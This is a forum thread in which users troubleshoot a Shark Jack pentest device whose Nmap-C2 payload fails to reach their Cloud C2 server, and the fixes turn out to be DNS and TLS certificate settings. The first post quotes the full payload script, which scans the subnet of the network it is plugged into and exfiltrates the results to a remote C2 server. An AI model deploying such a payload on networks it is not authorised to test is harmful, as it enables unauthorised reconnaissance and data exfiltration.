Peque Posted March 6, 2022 Posted March 6, 2022 Hi Forum I've bought an essentialKit , and have the most of it running as expected. I've downloaded the payload from Hak5 Git repos - this payload --> https://github.com/hak5/sharkjack-payloads/tree/master/payloads/library/recon/Nmap-C2 The Sharkjack is updated to to latest Firmware - Version 1.1.0, and I can see the Sharkjack does everything that I want, the Loot are created etc. I can see that during execution of the payload, that the Sharkjack gets an IP on the target network - but nothing gets through to my C2 Cloud. As I can see - it should'n be an issue with my C2 Cloud - since I have Wifi Pineapple, lan Turtle and Squirrel running and connecting to C2 Cloud. How can I check this further, since as I can see - I can not SSH to the sharkjack during run of the payloads. And have tried reconfiguring my C2 Cloud settngs on the jack several times with out any luck. The Executed payload: #!/bin/bash # # Title: Nmap Payload for Shark Jack w/ C2 # Author: Hak5 (modifications from REDD) # Version: 1.1 # # All credit goes to Hak5 Team. I just through in a simple check for if # C2 is provisioned in the SharkJack. - If so, exfiltrate! # # Scans target subnet with Nmap using specified options. Saves each scan result # to loot storage folder. Exfiltrates all scans to C2 if provisioned. # # LED SETUP ... Obtaining IP address from DHCP # LED ATTACK ... Scanning # LED FINISH ... Scan Complete # # See nmap --help for options. Default "-sP" ping scans the address space for # fast host discovery. C2PROVISION="/etc/device.config" NMAP_OPTIONS="-sP --host-timeout 30s --max-retries 3" LOOT_DIR=/root/loot/nmap # Setup loot directory, DHCP client, and determine subnet LED SETUP mkdir -p $LOOT_DIR COUNT=$(($(ls -l $LOOT_DIR/*.txt | wc -l)+1)) NETMODE DHCP_CLIENT while [ -z "$SUBNET" ]; do sleep 1 && SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//') done # Scan network LED ATTACK nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$COUNT.txt # Exfiltrate Loot to Cloud C2 if [[ -f "$C2PROVISION" ]]; then LED SPECIAL # Connect to Cloud C2 C2CONNECT # Wait until Cloud C2 connection is established while ! pgrep cc-client; do sleep 1; done # Exfiltrate all test loot files FILES="$LOOT_DIR/*.txt" for f in $FILES; do C2EXFIL STRING $f Nmap-C2-Payload; done else # Exit script if not provisioned for C2 LED R SOLID exit 1 fi LED FINISH sleep 2 && halt Can I Just disable the last 2 lines - so I can SSh into the jack to see what and if there's an error while trying to connect to my C2 Cloud Since everything else is working as intended - I do not get why I can't get this Sharkjack to deliever to my C2 Cloud. Any ideas of what is wrong /P
dark_pyrro Posted March 6, 2022 Posted March 6, 2022 Not sure if I missed reading some info, but have you gotten the Shark to connect to C2 at all? Not specifically delivering loot, but that you can see it as a connected device in the C2 interface. You could try a payload that just connects as a DHCP client (with sshd started) to a network and ssh into it and try to connect to C2 and extract loot manually looking for errors. Does the cc-client error log in /tmp tell anything? How are you running your C2 server? Using https?
Peque Posted March 6, 2022 Author Posted March 6, 2022 I have placed the device.config - in /etc/ Yes - My C2 is running https. I have also tried the default payload --> with just should test this C2EXFIL - but still not getting anything ton my C2 Cloud. THe only thing i cc-client-error are these 3 lines repeating [1646558183 !ERR INITSYNC ] Error in startup sync post [1646558183 !ERR MAIN ] Device startup sync failed. Retrying... [1646558188 !ERR CURL ] Error posting update to server... But other devices on the same network is working without problem. Well - Found the problem - Internal DNS Since this is just test setup at the moment, seperate network at home. /etc/resolv.conf --> only nameserver 127.0.0.1 Adding my local DNS Server ( PFsense firewall) - and now I'm able to connect to the C2 Cloud. Extra: Is it possible to make it add this DNS server automatickly - as a failover DNS, so if the default dns - 127.0.0.1 does not resolve - then add a speficied extra DNS server And thanks for the input - that gave me the answer
dark_pyrro Posted March 6, 2022 Posted March 6, 2022 Perhaps try the following (interface name might need to be changed, can't remember the Shark interface name off the top of my head) uci set network.wan.dns="8.8.8.8 8.8.4.4" uci commit network service network reload Some more info that might helphttps://openwrt.org/docs/guide-user/base-system/dhcp_configuration#upstream_dns_provider
TheReelBillbo Posted March 23, 2023 Posted March 23, 2023 Hi I am stuck here myself. I have uploaded the device.config, ran C2CONNECT but when checking /tmp/cc-client-error.log I have the following: [1679537734 !ERR INITSYNC ] Error in startup sync post [1679537734 !ERR MAIN ] Device startup sync failed. Retrying... Which just keeps repeating. I had issues trying to UPDATE_FIRMWARE and UPDATE_PAYLOAD but was able to get those working properly by setting the date. The SJC never checks in to C2 either. Any help is appreciated, I have reviewed the forums and am striking out...
dark_pyrro Posted March 23, 2023 Posted March 23, 2023 Can you ping, for example, www.google.com from the Shark? Where is your C2 server located? Locally on your own network or accessible over internet?
TheReelBillbo Posted March 23, 2023 Posted March 23, 2023 6 hours ago, dark_pyrro said: Can you ping, for example, www.google.com from the Shark? Where is your C2 server located? Locally on your own network or accessible over internet? Yes, I can ping my C2 instance, I can ping example.com and 8.8.8.8 or anything else from the SJC. My C2 server is internet based.
dark_pyrro Posted March 23, 2023 Posted March 23, 2023 Are you starting the C2 server using the https parameter?
0ne-nine9 Posted April 25, 2023 Posted April 25, 2023 Hey all! Just wanted to drop in and note my own experience. All of the above applied to me, but one thing I modified is stopped using self-signed certificates with openssl. Instead, I modified the service as per the guidance below, to ensure I use Let'sEncrypt with the following switches enabled: -hostname {hostname} -https This allowed my SharkJack to quickly connect and transfer loot to the C2. It seems that it doesn't like self-signed certificates at all, which makes sense in hindsight.
Recommended Posts
Archived
This topic is now archived and is closed to further replies.